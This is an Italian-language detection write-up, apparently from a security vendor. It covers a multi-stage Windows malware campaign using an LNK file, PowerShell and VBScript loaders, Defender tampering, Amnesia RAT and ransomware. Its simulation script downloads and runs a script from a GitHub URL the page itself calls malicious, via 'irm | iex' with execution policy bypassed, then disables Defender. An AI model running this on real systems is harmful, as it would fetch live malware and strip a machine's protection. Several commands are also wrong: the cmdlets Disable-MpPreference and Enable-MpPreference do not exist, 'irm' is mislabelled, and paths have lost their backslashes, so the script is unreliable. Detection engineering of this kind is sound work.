All’interno di un’Operazione Malware Multi-Fase su Windows
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
FortiGuard Labs ha identificato una catena di intrusione multi-stage su Windows che inizia con un file LNK malevolo consegnato all’interno di un archivio compresso. Il collegamento avvia un loader PowerShell iniziale che scarica script successivi da GitHub e successivamente passa il controllo a un orchestratore VBScript offuscato. Il flusso di lavoro tenta quindi di indebolire le difese dell’endpoint disattivando Microsoft Defender, distribuendo l’utilità Defendnot e mettendo in scena sia Amnesia RAT che ransomware Hakuna Matata. L’operazione si conclude lasciando cadere un componente WinLocker che blocca il desktop per interrompere il recupero e mettere pressione alle vittime.
Indagine
Gli investigatori hanno ricostruito il percorso di esecuzione dallo stadio PowerShell attivato da LNK a un VBScript che ricostruisce i payload in memoria, culminando nel dispiegamento di ransomware e nel comportamento di blocco del desktop. Le misure difensive sono state bypassate tramite modifiche mirate al registro e iniettando una DLL Defendnot in Taskmgr.exe. La persistenza è stata implementata utilizzando una combinazione di voci di chiavi Run e artefatti nella cartella Startup per riattivare la catena dopo il logon.
Mitigazione
Monitora cambiamenti sospetti a livello di politiche nel registro sotto HKLMSOFTWAREPoliciesMicrosoftWindows Defender e HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies. Blocca le uscite verso noti URL malevoli di GitHub e Dropbox utilizzati per la messa in scena, e allerta su modelli di download ed esecuzione di PowerShell originati da lanci di LNK. Imporre una lista di applicazioni consentite e rafforzare i controlli di esecuzione di PowerShell per ridurre l’accesso iniziale basato su script.
Risposta
Se rilevato, isola l’endpoint, ripristina le impostazioni del registro relative a Defender a uno stato noto come buono, e rimuovi i file malevoli e le voci di persistenza. Caccia i processi Amnesia RAT attivi e l’attività di rete associata, e verifica se è avvenuta l’esecuzione del ransomware. Esegui una triage forense completa per determinare l’impatto e sradicare i resti, quindi recupera i sistemi da backup puliti ove possibile.
Flusso di Attacco
Rilevamenti
Processo Sospetto Utilizza un URL nella Riga di Comando (via cmdline)
Visualizza
Disabilita il Monitoraggio Realtime di Windows Defender e Altre Modifiche alle Preferenze (via cmdline)
Visualizza
IOC (HashSha256) da rilevare: In una Campagna Malware Multi-Stage su Windows
Visualizza
Attività di Rete Malevola e C2 via GitHub, Dropbox, Telegram [Connessione di Rete Windows]
Visualizza
Esecuzione PowerShell nella Campagna Malware su Windows [Powershell di Windows]
Visualizza
Esecuzione di PowerShell e CMD con Install.exe come Esche [Creazione del Processo Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-Flight di Telemetria & Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirano a generare esattamente la telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrazione dell’Attacco & Comandi:
Un avversario che ha ottenuto un primo appoggio sull’endpoint desidera scaricare ed eseguire un payload PowerShell malevolo mentre evita la politica di esecuzione predefinita. UsanoInvoke‑Expression(iex) combinato conInvoke‑WebRequest(irm) per estrarre uno script da un URL raw di GitHub remoto, eseguendolo sotto-ExecutionPolicy Bypass. Dopo aver stabilito la persistenza, disabilitano il monitoraggio in tempo reale di Windows Defender per evitare il rilevamento di payload successivi. Questi passaggi generano direttamente le stringhe di comando che la regola Sigma monitora. -
Script di Test di Regressione:
# -------------------------------------------------------------- # Passaggio 1: Esegui lo script remoto con ExecutionPolicy Bypass # -------------------------------------------------------------- $maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1" powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex" # -------------------------------------------------------------- # Passaggio 2: Disabilita il monitoraggio in tempo reale di Windows Defender # -------------------------------------------------------------- # Disabilita la protezione in tempo reale Disable-MpPreference -DisableRealtimeMonitoring $true # Aggiungi un percorso di esclusione (simulato) Add-MpPreference -ExclusionPath "C:TempExcludeFolder" -
Comandi di Pulizia:
# Riabilita il monitoraggio in tempo reale di Windows Defender Enable-MpPreference -DisableRealtimeMonitoring $false # Rimuovi il percorso di esclusione (se esiste) Remove-MpPreference -ExclusionPath "C:TempExcludeFolder" -ErrorAction SilentlyContinue # Ferma eventuali processi PowerShell rimanenti avviati dallo script Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'kira.ps1'} | Stop-Process -Force